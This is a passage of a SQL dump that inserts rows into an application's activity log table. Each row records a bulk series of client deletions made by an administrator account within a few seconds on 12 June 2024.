(12477, 'Client Deleted [ID: 1430]', '2024-06-12 17:08:07', 'Admin WIT'),
(12478, 'Client Deleted [ID: 1429]', '2024-06-12 17:08:07', 'Admin WIT'),
(12479, 'Client Deleted [ID: 1428]', '2024-06-12 17:08:07', 'Admin WIT'),
(12480, 'Client Deleted [ID: 1427]', '2024-06-12 17:08:08', 'Admin WIT'),
(12481, 'Client Deleted [ID: 1426]', '2024-06-12 17:08:08', 'Admin WIT'),
(12482, 'Client Deleted [ID: 1425]', '2024-06-12 17:08:08', 'Admin WIT'),
(12483, 'Client Deleted [ID: 1424]', '2024-06-12 17:08:08', 'Admin WIT'),
(12484, 'Client Deleted [ID: 1421]', '2024-06-12 17:08:08', 'Admin WIT'),
(12486, 'Client Deleted [ID: 1420]', '2024-06-12 17:08:08', 'Admin WIT'),
(12487, 'Client Deleted [ID: 1419]', '2024-06-12 17:08:08', 'Admin WIT'),
(12488, 'Client Deleted [ID: 1418]', '2024-06-12 17:08:08', 'Admin WIT'),
(12489, 'Client Deleted [ID: 1417]', '2024-06-12 17:08:08', 'Admin WIT'),
(12490, 'Client Deleted [ID: 1415]', '2024-06-12 17:08:08', 'Admin WIT'),
(12491, 'Client Deleted [ID: 1413]', '2024-06-12 17:08:08', 'Admin WIT'),
(12492, 'Client Deleted [ID: 1412]', '2024-06-12 17:08:08', 'Admin WIT'),
(12493, 'Client Deleted [ID: 1411]', '2024-06-12 17:08:08', 'Admin WIT'),
(12494, 'Client Deleted [ID: 1410]', '2024-06-12 17:08:08', 'Admin WIT'),
(12495, 'Client Deleted [ID: 1409]', '2024-06-12 17:08:08', 'Admin WIT'),
(12496, 'Client Deleted [ID: 1408]', '2024-06-12 17:08:08', 'Admin WIT'),
(12497, 'Client Deleted [ID: 1407]', '2024-06-12 17:08:08', 'Admin WIT'),
(12499, 'Client Deleted [ID: 1404]', '2024-06-12 17:08:08', 'Admin WIT'),
(12500, 'Client Deleted [ID: 1402]', '2024-06-12 17:08:08', 'Admin WIT'),
(12501, 'Client Deleted [ID: 1401]', '2024-06-12 17:08:08', 'Admin WIT'),
(12502, 'Client Deleted [ID: 1400]', '2024-06-12 17:08:08', 'Admin WIT'),
(12503, 'Client Deleted [ID: 1397]', '2024-06-12 17:08:08', 'Admin WIT'),
(12504, 'Client Deleted [ID: 1396]', '2024-06-12 17:08:08', 'Admin WIT'),
(12505, 'Client Deleted [ID: 1395]', '2024-06-12 17:08:08', 'Admin WIT'),
(12506, 'Client Deleted [ID: 1393]', '2024-06-12 17:08:08', 'Admin WIT'),
(12507, 'Client Deleted [ID: 1392]', '2024-06-12 17:08:08', 'Admin WIT'),
(12508, 'Client Deleted [ID: 1391]', '2024-06-12 17:08:08', 'Admin WIT'),
(12509, 'Client Deleted [ID: 1390]', '2024-06-12 17:08:08', 'Admin WIT'),
(12510, 'Client Deleted [ID: 1389]', '2024-06-12 17:08:08', 'Admin WIT'),
(12511, 'Client Deleted [ID: 1388]', '2024-06-12 17:08:08', 'Admin WIT'),
(12512, 'Client Deleted [ID: 1387]', '2024-06-12 17:08:08', 'Admin WIT'),
(12513, 'Client Deleted [ID: 1386]', '2024-06-12 17:08:08', 'Admin WIT'),
(12514, 'Client Deleted [ID: 1381]', '2024-06-12 17:08:08', 'Admin WIT'),
(12515, 'Client Deleted [ID: 1380]', '2024-06-12 17:08:08', 'Admin WIT'),
(12516, 'Client Deleted [ID: 1379]', '2024-06-12 17:08:08', 'Admin WIT'),
(12517, 'Client Deleted [ID: 1378]', '2024-06-12 17:08:08', 'Admin WIT'),
(12518, 'Client Deleted [ID: 1377]', '2024-06-12 17:08:08', 'Admin WIT'),
(12519, 'Client Deleted [ID: 1376]', '2024-06-12 17:08:08', 'Admin WIT'),
(12520, 'Client Deleted [ID: 1375]', '2024-06-12 17:08:08', 'Admin WIT'),
(12521, 'Client Deleted [ID: 1374]', '2024-06-12 17:08:08', 'Admin WIT'),
(12522, 'Client Deleted [ID: 1373]', '2024-06-12 17:08:08', 'Admin WIT'),
(12523, 'Client Deleted [ID: 1372]', '2024-06-12 17:08:08', 'Admin WIT'),
(12524, 'Client Deleted [ID: 1371]', '2024-06-12 17:08:08', 'Admin WIT'),
(12525, 'Client Deleted [ID: 1370]', '2024-06-12 17:08:08', 'Admin WIT'),
(12526, 'Client Deleted [ID: 1369]', '2024-06-12 17:08:08', 'Admin WIT'),
(12527, 'Client Deleted [ID: 1368]', '2024-06-12 17:08:08', 'Admin WIT'),
(12528, 'Client Deleted [ID: 1367]', '2024-06-12 17:08:08', 'Admin WIT'),
(12529, 'Client Deleted [ID: 1364]', '2024-06-12 17:08:08', 'Admin WIT'),
(12530, 'Client Deleted [ID: 1363]', '2024-06-12 17:08:08', 'Admin WIT'),
(12531, 'Client Deleted [ID: 1362]', '2024-06-12 17:08:08', 'Admin WIT'),
(12532, 'Client Deleted [ID: 1361]', '2024-06-12 17:08:08', 'Admin WIT'),
(12533, 'Client Deleted [ID: 1360]', '2024-06-12 17:08:08', 'Admin WIT'),
(12534, 'Client Deleted [ID: 1359]', '2024-06-12 17:08:08', 'Admin WIT'),
(12535, 'Client Deleted [ID: 1358]', '2024-06-12 17:08:08', 'Admin WIT'),
(12536, 'Client Deleted [ID: 1357]', '2024-06-12 17:08:08', 'Admin WIT'),
(12537, 'Client Deleted [ID: 1356]', '2024-06-12 17:08:08', 'Admin WIT'),
(12538, 'Client Deleted [ID: 1355]', '2024-06-12 17:08:08', 'Admin WIT'),
(12539, 'Client Deleted [ID: 1354]', '2024-06-12 17:08:08', 'Admin WIT'),
(12540, 'Client Deleted [ID: 1353]', '2024-06-12 17:08:08', 'Admin WIT'),
(12541, 'Client Deleted [ID: 1352]', '2024-06-12 17:08:08', 'Admin WIT'),
(12542, 'Client Deleted [ID: 1351]', '2024-06-12 17:08:08', 'Admin WIT'),
(12543, 'Client Deleted [ID: 1349]', '2024-06-12 17:08:08', 'Admin WIT'),
(12544, 'Client Deleted [ID: 1348]', '2024-06-12 17:08:08', 'Admin WIT'),
(12545, 'Client Deleted [ID: 1347]', '2024-06-12 17:08:08', 'Admin WIT'),
(12546, 'Client Deleted [ID: 1346]', '2024-06-12 17:08:08', 'Admin WIT'),
(12547, 'Client Deleted [ID: 1345]', '2024-06-12 17:08:08', 'Admin WIT'),
(12548, 'Client Deleted [ID: 1344]', '2024-06-12 17:08:08', 'Admin WIT'),
(12549, 'Client Deleted [ID: 1343]', '2024-06-12 17:08:08', 'Admin WIT'),
(12550, 'Client Deleted [ID: 1342]', '2024-06-12 17:08:08', 'Admin WIT'),
(12551, 'Client Deleted [ID: 1341]', '2024-06-12 17:08:08', 'Admin WIT'),
(12552, 'Client Deleted [ID: 1335]', '2024-06-12 17:08:08', 'Admin WIT'),
(12553, 'Client Deleted [ID: 1334]', '2024-06-12 17:08:08', 'Admin WIT'),
(12554, 'Client Deleted [ID: 1333]', '2024-06-12 17:08:08', 'Admin WIT'),
(12555, 'Client Deleted [ID: 1330]', '2024-06-12 17:08:08', 'Admin WIT'),
(12556, 'Client Deleted [ID: 1321]', '2024-06-12 17:08:08', 'Admin WIT'),
(12557, 'Client Deleted [ID: 1320]', '2024-06-12 17:08:08', 'Admin WIT'),
(12558, 'Client Deleted [ID: 1315]', '2024-06-12 17:08:08', 'Admin WIT'),
(12559, 'Client Deleted [ID: 1313]', '2024-06-12 17:08:08', 'Admin WIT'),
(12560, 'Client Deleted [ID: 1312]', '2024-06-12 17:08:08', 'Admin WIT'),
(12561, 'Client Deleted [ID: 1311]', '2024-06-12 17:08:08', 'Admin WIT'),
(12562, 'Client Deleted [ID: 1310]', '2024-06-12 17:08:08', 'Admin WIT'),
(12563, 'Client Deleted [ID: 1308]', '2024-06-12 17:08:08', 'Admin WIT'),
(12564, 'Client Deleted [ID: 1307]', '2024-06-12 17:08:08', 'Admin WIT'),
(12565, 'Client Deleted [ID: 1306]', '2024-06-12 17:08:08', 'Admin WIT'),
(12566, 'Client Deleted [ID: 1304]', '2024-06-12 17:08:08', 'Admin WIT'),
(12567, 'Client Deleted [ID: 1303]', '2024-06-12 17:08:08', 'Admin WIT'),
(12568, 'Client Deleted [ID: 1302]', '2024-06-12 17:08:08', 'Admin WIT'),
(12569, 'Client Deleted [ID: 1300]', '2024-06-12 17:08:08', 'Admin WIT'),
(12570, 'Client Deleted [ID: 1299]', '2024-06-12 17:08:08', 'Admin WIT'),
(12571, 'Client Deleted [ID: 1297]', '2024-06-12 17:08:09', 'Admin WIT'),
(12572, 'Client Deleted [ID: 1296]', '2024-06-12 17:08:09', 'Admin WIT'),
(12573, 'Client Deleted [ID: 1294]', '2024-06-12 17:08:09', 'Admin WIT'),
(12574, 'Client Deleted [ID: 1293]', '2024-06-12 17:08:09', 'Admin WIT'),
(12575, 'Client Deleted [ID: 1292]', '2024-06-12 17:08:09', 'Admin WIT'),
(12576, 'Client Deleted [ID: 1291]', '2024-06-12 17:08:09', 'Admin WIT'),
(12577, 'Client Deleted [ID: 1290]', '2024-06-12 17:08:09', 'Admin WIT'),
(12578, 'Client Deleted [ID: 1289]', '2024-06-12 17:08:09', 'Admin WIT'),
(12579, 'Client Deleted [ID: 1288]', '2024-06-12 17:08:09', 'Admin WIT'),
(12580, 'Client Deleted [ID: 1287]', '2024-06-12 17:08:09', 'Admin WIT'),
(12581, 'Client Deleted [ID: 1286]', '2024-06-12 17:08:09', 'Admin WIT'),
(12582, 'Client Deleted [ID: 1285]', '2024-06-12 17:08:09', 'Admin WIT'),
(12583, 'Client Deleted [ID: 1284]', '2024-06-12 17:08:09', 'Admin WIT'),
(12584, 'Client Deleted [ID: 1283]', '2024-06-12 17:08:09', 'Admin WIT'),
(12585, 'Client Deleted [ID: 1282]', '2024-06-12 17:08:09', 'Admin WIT'),
(12586, 'Client Deleted [ID: 1281]', '2024-06-12 17:08:09', 'Admin WIT'),
(12587, 'Client Deleted [ID: 1280]', '2024-06-12 17:08:09', 'Admin WIT'),
(12588, 'Client Deleted [ID: 1279]', '2024-06-12 17:08:09', 'Admin WIT'),
(12589, 'Client Deleted [ID: 1278]', '2024-06-12 17:08:09', 'Admin WIT'),
(12590, 'Client Deleted [ID: 1277]', '2024-06-12 17:08:09', 'Admin WIT'),
(12591, 'Client Deleted [ID: 1274]', '2024-06-12 17:08:09', 'Admin WIT'),
(12592, 'Client Deleted [ID: 1273]', '2024-06-12 17:08:09', 'Admin WIT'),
(12593, 'Client Deleted [ID: 1272]', '2024-06-12 17:08:09', 'Admin WIT'),
(12594, 'Client Deleted [ID: 1271]', '2024-06-12 17:08:09', 'Admin WIT'),
(12595, 'Client Deleted [ID: 1270]', '2024-06-12 17:08:09', 'Admin WIT'),
(12596, 'Client Deleted [ID: 1269]', '2024-06-12 17:08:09', 'Admin WIT'),
(12597, 'Client Deleted [ID: 1268]', '2024-06-12 17:08:09', 'Admin WIT'),
(12598, 'Client Deleted [ID: 1267]', '2024-06-12 17:08:09', 'Admin WIT'),
(12599, 'Client Deleted [ID: 1266]', '2024-06-12 17:08:09', 'Admin WIT'),
(12600, 'Client Deleted [ID: 1264]', '2024-06-12 17:08:09', 'Admin WIT'),
(12601, 'Client Deleted [ID: 1263]', '2024-06-12 17:08:09', 'Admin WIT'),
(12602, 'Client Deleted [ID: 1262]', '2024-06-12 17:08:09', 'Admin WIT'),
(12603, 'Client Deleted [ID: 1261]', '2024-06-12 17:08:09', 'Admin WIT'),
(12604, 'Client Deleted [ID: 1259]', '2024-06-12 17:08:09', 'Admin WIT'),
(12605, 'Client Deleted [ID: 1258]', '2024-06-12 17:08:09', 'Admin WIT'),
(12606, 'Client Deleted [ID: 1257]', '2024-06-12 17:08:09', 'Admin WIT'),
(12608, 'Client Deleted [ID: 1256]', '2024-06-12 17:08:09', 'Admin WIT'),
(12609, 'Client Deleted [ID: 1255]', '2024-06-12 17:08:09', 'Admin WIT'),
(12610, 'Client Deleted [ID: 1254]', '2024-06-12 17:08:09', 'Admin WIT'),
(12612, 'Client Deleted [ID: 1253]', '2024-06-12 17:08:09', 'Admin WIT'),
(12613, 'Client Deleted [ID: 1252]', '2024-06-12 17:08:09', 'Admin WIT'),
(12614, 'Client Deleted [ID: 1249]', '2024-06-12 17:08:09', 'Admin WIT'),
(12615, 'Client Deleted [ID: 1247]', '2024-06-12 17:08:09', 'Admin WIT'),
(12616, 'Client Deleted [ID: 1246]', '2024-06-12 17:08:09', 'Admin WIT'),
(12617, 'Client Deleted [ID: 1244]', '2024-06-12 17:08:09', 'Admin WIT'),
(12618, 'Client Deleted [ID: 1242]', '2024-06-12 17:08:09', 'Admin WIT'),
(12619, 'Client Deleted [ID: 1241]', '2024-06-12 17:08:09', 'Admin WIT'),
(12620, 'Client Deleted [ID: 1240]', '2024-06-12 17:08:09', 'Admin WIT'),
(12622, 'Client Deleted [ID: 1238]', '2024-06-12 17:08:09', 'Admin WIT'),
(12623, 'Client Deleted [ID: 1237]', '2024-06-12 17:08:09', 'Admin WIT'),
(12624, 'Client Deleted [ID: 1236]', '2024-06-12 17:08:09', 'Admin WIT'),
(12626, 'Client Deleted [ID: 1235]', '2024-06-12 17:08:09', 'Admin WIT'),
(12627, 'Client Deleted [ID: 1234]', '2024-06-12 17:08:09', 'Admin WIT'),
(12628, 'Client Deleted [ID: 1233]', '2024-06-12 17:08:09', 'Admin WIT'),
(12629, 'Client Deleted [ID: 1232]', '2024-06-12 17:08:09', 'Admin WIT'),
(12630, 'Client Deleted [ID: 1231]', '2024-06-12 17:08:09', 'Admin WIT'),
(12631, 'Client Deleted [ID: 1230]', '2024-06-12 17:08:09', 'Admin WIT'),
(12632, 'Client Deleted [ID: 1229]', '2024-06-12 17:08:09', 'Admin WIT'),
(12633, 'Client Deleted [ID: 1228]', '2024-06-12 17:08:09', 'Admin WIT'),
(12635, 'Client Deleted [ID: 1227]', '2024-06-12 17:08:09', 'Admin WIT'),
(12636, 'Client Deleted [ID: 1226]', '2024-06-12 17:08:09', 'Admin WIT'),
(12637, 'Client Deleted [ID: 1225]', '2024-06-12 17:08:09', 'Admin WIT'),
(12638, 'Client Deleted [ID: 1224]', '2024-06-12 17:08:09', 'Admin WIT'),
(12639, 'Client Deleted [ID: 1223]', '2024-06-12 17:08:09', 'Admin WIT'),
(12640, 'Client Deleted [ID: 1222]', '2024-06-12 17:08:09', 'Admin WIT'),
(12641, 'Client Deleted [ID: 1220]', '2024-06-12 17:08:09', 'Admin WIT'),
(12642, 'Client Deleted [ID: 1219]', '2024-06-12 17:08:09', 'Admin WIT'),
(12643, 'Client Deleted [ID: 1218]', '2024-06-12 17:08:09', 'Admin WIT'),
(12644, 'Client Deleted [ID: 1217]', '2024-06-12 17:08:09', 'Admin WIT'),
(12645, 'Client Deleted [ID: 1216]', '2024-06-12 17:08:09', 'Admin WIT'),
(12646, 'Client Deleted [ID: 1215]', '2024-06-12 17:08:09', 'Admin WIT'),
(12647, 'Client Deleted [ID: 1214]', '2024-06-12 17:08:09', 'Admin WIT'),
(12648, 'Client Deleted [ID: 1213]', '2024-06-12 17:08:09', 'Admin WIT'),
(12649, 'Client Deleted [ID: 1212]', '2024-06-12 17:08:09', 'Admin WIT'),
(12650, 'Client Deleted [ID: 1211]', '2024-06-12 17:08:09', 'Admin WIT'),
(12651, 'Client Deleted [ID: 1210]', '2024-06-12 17:08:09', 'Admin WIT'),
(12652, 'Client Deleted [ID: 1209]', '2024-06-12 17:08:09', 'Admin WIT'),
(12653, 'Client Deleted [ID: 1208]', '2024-06-12 17:08:09', 'Admin WIT'),
(12654, 'Client Deleted [ID: 1207]', '2024-06-12 17:08:09', 'Admin WIT'),
(12655, 'Client Deleted [ID: 1206]', '2024-06-12 17:08:09', 'Admin WIT'),
(12656, 'Client Deleted [ID: 1205]', '2024-06-12 17:08:09', 'Admin WIT'),
(12658, 'Client Deleted [ID: 1204]', '2024-06-12 17:08:09', 'Admin WIT'),
(12659, 'Client Deleted [ID: 1203]', '2024-06-12 17:08:09', 'Admin WIT'),
(12660, 'Client Deleted [ID: 1202]', '2024-06-12 17:08:10', 'Admin WIT'),
(12661, 'Client Deleted [ID: 1201]', '2024-06-12 17:08:10', 'Admin WIT'),
(12663, 'Client Deleted [ID: 1200]', '2024-06-12 17:08:10', 'Admin WIT'),
(12665, 'Client Deleted [ID: 1197]', '2024-06-12 17:08:10', 'Admin WIT'),
(12666, 'Client Deleted [ID: 1196]', '2024-06-12 17:08:10', 'Admin WIT'),
(12668, 'Client Deleted [ID: 1195]', '2024-06-12 17:08:10', 'Admin WIT'),
(12669, 'Client Deleted [ID: 1194]', '2024-06-12 17:08:10', 'Admin WIT'),
(12670, 'Client Deleted [ID: 1193]', '2024-06-12 17:08:10', 'Admin WIT'),
(12671, 'Client Deleted [ID: 1192]', '2024-06-12 17:08:10', 'Admin WIT'),
(12672, 'Client Deleted [ID: 1191]', '2024-06-12 17:08:10', 'Admin WIT'),
(12673, 'Client Deleted [ID: 952]', '2024-06-12 17:08:10', 'Admin WIT'),
(12674, 'Client Deleted [ID: 951]', '2024-06-12 17:08:10', 'Admin WIT'),
(12675, 'Client Deleted [ID: 949]', '2024-06-12 17:08:10', 'Admin WIT'),
(12676, 'Client Deleted [ID: 948]', '2024-06-12 17:08:10', 'Admin WIT'),
(12677, 'Client Deleted [ID: 947]', '2024-06-12 17:08:10', 'Admin WIT'),
(12678, 'Client Deleted [ID: 946]', '2024-06-12 17:08:10', 'Admin WIT'),
(12679, 'Client Deleted [ID: 945]', '2024-06-12 17:08:10', 'Admin WIT'),
(12680, 'Client Deleted [ID: 944]', '2024-06-12 17:08:10', 'Admin WIT'),
(12681, 'Client Deleted [ID: 943]', '2024-06-12 17:08:10', 'Admin WIT'),
(12682, 'Client Deleted [ID: 942]', '2024-06-12 17:08:10', 'Admin WIT'),
(12683, 'Client Deleted [ID: 940]', '2024-06-12 17:08:10', 'Admin WIT'),
(12684, 'Client Deleted [ID: 939]', '2024-06-12 17:08:10', 'Admin WIT'),
(12685, 'Client Deleted [ID: 938]', '2024-06-12 17:08:10', 'Admin WIT'),
(12686, 'Client Deleted [ID: 937]', '2024-06-12 17:08:10', 'Admin WIT'),
(12687, 'Client Deleted [ID: 936]', '2024-06-12 17:08:10', 'Admin WIT'),
(12688, 'Client Deleted [ID: 935]', '2024-06-12 17:08:10', 'Admin WIT'),
(12689, 'Client Deleted [ID: 933]', '2024-06-12 17:08:10', 'Admin WIT'),
(12690, 'Client Deleted [ID: 932]', '2024-06-12 17:08:10', 'Admin WIT'),
(12691, 'Client Deleted [ID: 931]', '2024-06-12 17:08:10', 'Admin WIT'),
(12692, 'Client Deleted [ID: 930]', '2024-06-12 17:08:10', 'Admin WIT'),
(12693, 'Client Deleted [ID: 929]', '2024-06-12 17:08:10', 'Admin WIT'),
(12694, 'Client Deleted [ID: 928]', '2024-06-12 17:08:10', 'Admin WIT'),
(12695, 'Client Deleted [ID: 927]', '2024-06-12 17:08:10', 'Admin WIT'),
(12696, 'Client Deleted [ID: 926]', '2024-06-12 17:08:10', 'Admin WIT'),
(12697, 'Client Deleted [ID: 925]', '2024-06-12 17:08:10', 'Admin WIT'),
(12698, 'Client Deleted [ID: 924]', '2024-06-12 17:08:10', 'Admin WIT'),
(12699, 'Client Deleted [ID: 923]', '2024-06-12 17:08:10', 'Admin WIT'),
(12700, 'Client Deleted [ID: 922]', '2024-06-12 17:08:10', 'Admin WIT'),
(12701, 'Client Deleted [ID: 921]', '2024-06-12 17:08:10', 'Admin WIT'),
(12702, 'Client Deleted [ID: 920]', '2024-06-12 17:08:10', 'Admin WIT'),
(12703, 'Client Deleted [ID: 919]', '2024-06-12 17:08:10', 'Admin WIT'),
(12704, 'Client Deleted [ID: 916]', '2024-06-12 17:08:10', 'Admin WIT'),
(12705, 'Client Deleted [ID: 915]', '2024-06-12 17:08:10', 'Admin WIT'),
(12706, 'Client Deleted [ID: 914]', '2024-06-12 17:08:10', 'Admin WIT'),
(12707, 'Client Deleted [ID: 912]', '2024-06-12 17:08:10', 'Admin WIT'),
(12708, 'Client Deleted [ID: 911]', '2024-06-12 17:08:10', 'Admin WIT'),
(12709, 'Client Deleted [ID: 910]', '2024-06-12 17:08:10', 'Admin WIT'),
(12710, 'Client Deleted [ID: 909]', '2024-06-12 17:08:10', 'Admin WIT'),
(12711, 'Client Deleted [ID: 908]', '2024-06-12 17:08:10', 'Admin WIT'),
(12712, 'Client Deleted [ID: 907]', '2024-06-12 17:08:10', 'Admin WIT'),
(12713, 'Client Deleted [ID: 906]', '2024-06-12 17:08:10', 'Admin WIT'),
(12714, 'Client Deleted [ID: 904]', '2024-06-12 17:08:10', 'Admin WIT'),
(12715, 'Client Deleted [ID: 903]', '2024-06-12 17:08:10', 'Admin WIT'),
(12716, 'Client Deleted [ID: 902]', '2024-06-12 17:08:10', 'Admin WIT'),
(12717, 'Client Deleted [ID: 901]', '2024-06-12 17:08:10', 'Admin WIT'),
(12718, 'Client Deleted [ID: 900]', '2024-06-12 17:08:10', 'Admin WIT'),
(12721, 'Client Deleted [ID: 899]', '2024-06-12 17:08:10', 'Admin WIT'),
(12723, 'Client Deleted [ID: 898]', '2024-06-12 17:08:10', 'Admin WIT'),
(12724, 'Client Deleted [ID: 894]', '2024-06-12 17:08:10', 'Admin WIT'),
(12725, 'Client Deleted [ID: 893]', '2024-06-12 17:08:10', 'Admin WIT'),
(12726, 'Client Deleted [ID: 891]', '2024-06-12 17:08:10', 'Admin WIT'),
(12727, 'Client Deleted [ID: 889]', '2024-06-12 17:08:10', 'Admin WIT'),
(12728, 'Client Deleted [ID: 886]', '2024-06-12 17:08:10', 'Admin WIT'),
(12729, 'Client Deleted [ID: 884]', '2024-06-12 17:08:10', 'Admin WIT'),
(12730, 'Client Deleted [ID: 883]', '2024-06-12 17:08:10', 'Admin WIT'),
(12731, 'Client Deleted [ID: 882]', '2024-06-12 17:08:10', 'Admin WIT'),
(12732, 'Client Deleted [ID: 880]', '2024-06-12 17:08:10', 'Admin WIT'),
(12733, 'Client Deleted [ID: 878]', '2024-06-12 17:08:10', 'Admin WIT'),
(12734, 'Client Deleted [ID: 877]', '2024-06-12 17:08:10', 'Admin WIT'),
(12735, 'Client Deleted [ID: 876]', '2024-06-12 17:08:10', 'Admin WIT'),
(12736, 'Client Deleted [ID: 875]', '2024-06-12 17:08:10', 'Admin WIT'),
(12737, 'Client Deleted [ID: 874]', '2024-06-12 17:08:10', 'Admin WIT'),
(12738, 'Client Deleted [ID: 873]', '2024-06-12 17:08:10', 'Admin WIT'),
(12739, 'Client Deleted [ID: 872]', '2024-06-12 17:08:10', 'Admin WIT'),
(12740, 'Client Deleted [ID: 870]', '2024-06-12 17:08:10', 'Admin WIT'),
(12741, 'Client Deleted [ID: 869]', '2024-06-12 17:08:10', 'Admin WIT'),
(12742, 'Client Deleted [ID: 867]', '2024-06-12 17:08:10', 'Admin WIT'),
(12743, 'Client Deleted [ID: 866]', '2024-06-12 17:08:10', 'Admin WIT'),
(12744, 'Client Deleted [ID: 865]', '2024-06-12 17:08:10', 'Admin WIT'),
(12745, 'Client Deleted [ID: 863]', '2024-06-12 17:08:10', 'Admin WIT'),
(12746, 'Client Deleted [ID: 862]', '2024-06-12 17:08:10', 'Admin WIT'),
(12747, 'Client Deleted [ID: 861]', '2024-06-12 17:08:11', 'Admin WIT'),
(12748, 'Client Deleted [ID: 860]', '2024-06-12 17:08:11', 'Admin WIT'),
(12749, 'Client Deleted [ID: 857]', '2024-06-12 17:08:11', 'Admin WIT'),
(12750, 'Client Deleted [ID: 856]', '2024-06-12 17:08:11', 'Admin WIT'),
(12751, 'Client Deleted [ID: 855]', '2024-06-12 17:08:11', 'Admin WIT'),
(12752, 'Client Deleted [ID: 854]', '2024-06-12 17:08:11', 'Admin WIT'),
(12753, 'Client Deleted [ID: 853]', '2024-06-12 17:08:11', 'Admin WIT'),
(12754, 'Client Deleted [ID: 852]', '2024-06-12 17:08:11', 'Admin WIT'),
(12755, 'Client Deleted [ID: 851]', '2024-06-12 17:08:11', 'Admin WIT'),
(12756, 'Client Deleted [ID: 849]', '2024-06-12 17:08:11', 'Admin WIT'),
(12758, 'Client Deleted [ID: 848]', '2024-06-12 17:08:11', 'Admin WIT'),
(12759, 'Client Deleted [ID: 847]', '2024-06-12 17:08:11', 'Admin WIT'),
(12760, 'Client Deleted [ID: 846]', '2024-06-12 17:08:11', 'Admin WIT'),
(12762, 'Client Deleted [ID: 845]', '2024-06-12 17:08:11', 'Admin WIT'),
(12763, 'Client Deleted [ID: 844]', '2024-06-12 17:08:11', 'Admin WIT');
INSERT INTO `tblactivity_log` (`id`, `description`, `date`, `staffid`) VALUES
(12764, 'Client Deleted [ID: 837]', '2024-06-12 17:08:11', 'Admin WIT'),
(12765, 'Client Deleted [ID: 836]', '2024-06-12 17:08:11', 'Admin WIT'),
(12766, 'Client Deleted [ID: 835]', '2024-06-12 17:08:11', 'Admin WIT'),
(12767, 'Client Deleted [ID: 833]', '2024-06-12 17:08:11', 'Admin WIT'),
(12768, 'Client Deleted [ID: 832]', '2024-06-12 17:08:11', 'Admin WIT'),
(12769, 'Client Deleted [ID: 831]', '2024-06-12 17:08:11', 'Admin WIT'),
(12770, 'Client Deleted [ID: 830]', '2024-06-12 17:08:11', 'Admin WIT'),
(12771, 'Client Deleted [ID: 828]', '2024-06-12 17:08:11', 'Admin WIT'),
(12772, 'Client Deleted [ID: 827]', '2024-06-12 17:08:11', 'Admin WIT'),
(12777, 'Client Deleted [ID: 826]', '2024-06-12 17:08:11', 'Admin WIT'),
(12778, 'Client Deleted [ID: 825]', '2024-06-12 17:08:11', 'Admin WIT'),
(12779, 'Client Deleted [ID: 824]', '2024-06-12 17:08:11', 'Admin WIT'),
(12780, 'Client Deleted [ID: 822]', '2024-06-12 17:08:11', 'Admin WIT'),
(12782, 'Client Deleted [ID: 812]', '2024-06-12 17:08:11', 'Admin WIT'),
(12783, 'Client Deleted [ID: 810]', '2024-06-12 17:08:11', 'Admin WIT'),
(12784, 'Client Deleted [ID: 809]', '2024-06-12 17:08:11', 'Admin WIT'),
(12785, 'Client Deleted [ID: 808]', '2024-06-12 17:08:11', 'Admin WIT'),
(12786, 'Client Deleted [ID: 806]', '2024-06-12 17:08:11', 'Admin WIT'),
(12787, 'Client Deleted [ID: 805]', '2024-06-12 17:08:11', 'Admin WIT'),
(12788, 'Client Deleted [ID: 804]', '2024-06-12 17:08:11', 'Admin WIT'),
(12789, 'Client Deleted [ID: 803]', '2024-06-12 17:08:11', 'Admin WIT'),
(12790, 'Client Deleted [ID: 802]', '2024-06-12 17:08:11', 'Admin WIT'),
(12791, 'Client Deleted [ID: 801]', '2024-06-12 17:08:11', 'Admin WIT'),
(12792, 'Client Deleted [ID: 800]', '2024-06-12 17:08:11', 'Admin WIT'),
(12793, 'Client Deleted [ID: 799]', '2024-06-12 17:08:11', 'Admin WIT'),
(12794, 'Client Deleted [ID: 798]', '2024-06-12 17:08:11', 'Admin WIT'),
(12795, 'Client Deleted [ID: 797]', '2024-06-12 17:08:11', 'Admin WIT'),
(12796, 'Client Deleted [ID: 796]', '2024-06-12 17:08:11', 'Admin WIT'),
(12797, 'Client Deleted [ID: 795]', '2024-06-12 17:08:11', 'Admin WIT'),
(12798, 'Client Deleted [ID: 794]', '2024-06-12 17:08:11', 'Admin WIT'),
(12799, 'Client Deleted [ID: 793]', '2024-06-12 17:08:11', 'Admin WIT'),
(12800, 'Client Deleted [ID: 792]', '2024-06-12 17:08:11', 'Admin WIT'),
(12801, 'Client Deleted [ID: 791]', '2024-06-12 17:08:11', 'Admin WIT'),
(12802, 'Client Deleted [ID: 789]', '2024-06-12 17:08:11', 'Admin WIT'),
(12803, 'Client Deleted [ID: 788]', '2024-06-12 17:08:11', 'Admin WIT'),
(12806, 'Client Deleted [ID: 786]', '2024-06-12 17:08:11', 'Admin WIT'),
(12807, 'Client Deleted [ID: 785]', '2024-06-12 17:08:11', 'Admin WIT'),
(12808, 'Client Deleted [ID: 784]', '2024-06-12 17:08:11', 'Admin WIT'),
(12810, 'Client Deleted [ID: 783]', '2024-06-12 17:08:11', 'Admin WIT'),
(12811, 'Client Deleted [ID: 782]', '2024-06-12 17:08:11', 'Admin WIT'),
(12812, 'Client Deleted [ID: 781]', '2024-06-12 17:08:11', 'Admin WIT'),
(12813, 'Client Deleted [ID: 780]', '2024-06-12 17:08:11', 'Admin WIT'),
(12814, 'Client Deleted [ID: 778]', '2024-06-12 17:08:11', 'Admin WIT'),
(12815, 'Client Deleted [ID: 777]', '2024-06-12 17:08:11', 'Admin WIT'),
(12816, 'Client Deleted [ID: 776]', '2024-06-12 17:08:11', 'Admin WIT'),
(12817, 'Client Deleted [ID: 775]', '2024-06-12 17:08:11', 'Admin WIT'),
(12818, 'Client Deleted [ID: 774]', '2024-06-12 17:08:11', 'Admin WIT'),
(12819, 'Client Deleted [ID: 773]', '2024-06-12 17:08:11', 'Admin WIT'),
(12820, 'Client Deleted [ID: 772]', '2024-06-12 17:08:11', 'Admin WIT'),
(12821, 'Client Deleted [ID: 771]', '2024-06-12 17:08:11', 'Admin WIT'),
(12822, 'Client Deleted [ID: 769]', '2024-06-12 17:08:11', 'Admin WIT'),
(12823, 'Client Deleted [ID: 768]', '2024-06-12 17:08:11', 'Admin WIT'),
(12824, 'Client Deleted [ID: 767]', '2024-06-12 17:08:11', 'Admin WIT'),
(12825, 'Client Deleted [ID: 766]', '2024-06-12 17:08:11', 'Admin WIT'),
(12826, 'Client Deleted [ID: 765]', '2024-06-12 17:08:11', 'Admin WIT'),
(12827, 'Client Deleted [ID: 764]', '2024-06-12 17:08:11', 'Admin WIT'),
(12828, 'Client Deleted [ID: 762]', '2024-06-12 17:08:11', 'Admin WIT'),
